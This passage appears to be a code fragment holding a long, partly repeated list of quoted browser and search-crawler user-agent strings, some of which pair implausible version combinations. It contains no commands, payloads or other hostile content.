'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
